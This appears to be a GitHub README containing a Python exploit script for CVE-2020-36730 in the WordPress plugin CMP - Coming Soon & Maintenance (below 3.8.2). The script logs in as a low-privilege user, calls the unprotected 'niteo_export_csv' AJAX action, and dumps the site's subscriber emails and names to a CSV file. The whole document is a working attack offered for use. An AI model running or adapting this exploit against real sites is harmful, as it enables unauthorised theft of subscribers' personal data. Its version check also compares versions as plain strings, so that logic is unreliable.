README.md
Rendering markdown...
#!/usr/bin/env python3
import argparse
import requests
import re
from getpass import getpass
from bs4 import BeautifulSoup
import os
## Exploit script by @RandomRobbieBF
http_proxy = ""
os.environ['HTTP_PROXY'] = http_proxy
os.environ['HTTPS_PROXY'] = http_proxy
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
def check_plugin_version(url,username,password):
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'}
plugin_url = ""+url+"/wp-content/plugins/cmp-coming-soon-maintenance/readme.txt"
response = requests.get(plugin_url, headers=headers,verify=False,timeout=30)
if response.status_code == 200:
content = response.text
version_line = next((line for line in content.split('\n') if line.startswith('Stable tag:')), None)
if version_line:
version = version_line.split(':')[1].strip()
if version > '3.8.2':
print("The plugin version is 3.8.2 or above.")
exit()
else:
print("The plugin version is below 3.8.2.")
print("The plugin version is "+version+"")
return version
else:
print("Failed to find the version information in the readme.txt file.")
exit()
else:
print("Plugin not installed")
exit()
def vulncheck(url, username, password):
# Perform vulnerability check logic here
print("Vulnerability check:", url)
# Login to WordPress
login_url = f"{url}/wp-login.php"
session = requests.Session()
login_data = {
"log": username,
"pwd": password,
"wp-submit": "Log In",
"redirect_to": f"{url}/wp-admin/",
}
try:
login_response = session.post(login_url, data=login_data, headers={"User-Agent": user_agent})
login_response.raise_for_status()
# Extract the required cookies from the response headers
cookies = login_response.cookies
# Confirm successful login
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
print("Logged in successfully.")
try:
paramsPost = {"action":"niteo_export_csv"}
headers = {"Origin":url,"Accept":"*/*","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0","Referer":""+url+"/wp-admin/admin.php?page=cmp-subscribers","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate, br","Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"}
response = session.post(""+url+"/wp-admin/admin-ajax.php", data=paramsPost, headers=headers)
if "ID,Date,Email,Firstname,Lastname,Fullname" in response.text:
print("\n\n")
print(response.text)
text_file = open("emails.csv", "w+")
text_file.write(response.text)
text_file.close()
else:
print("Failed to extract CSV")
except:
print("Failed to Login")
except:
print("There was an error")
# Add the vulnerability description as a comment
DESCRIPTION = """
CMP - Coming Soon & Maintenance < 3.8.2 - Improper Access Controls on AJAX Calls (Subscriber+)
Description:
Some of the AJAX calls from the plugin do not properly check for capabilities and CSRF tokens, leading to issues such as arbitrary post read, subscribers list export and plugin deactivation.
CVE-2020-36730
"""
# Use argparse to get the URL, username, and password arguments
parser = argparse.ArgumentParser(description=DESCRIPTION)
parser.add_argument("-u", "--url", help="Website URL", required=True)
parser.add_argument("-un", "--username", help="WordPress username")
parser.add_argument("-p", "--password", help="WordPress password")
args = parser.parse_args()
# Prompt for password if not provided as an argument
if not args.password:
args.password = getpass("Enter the WordPress password: ")
check_plugin_version(args.url, args.username,args.password)
vulncheck(args.url, args.username, args.password)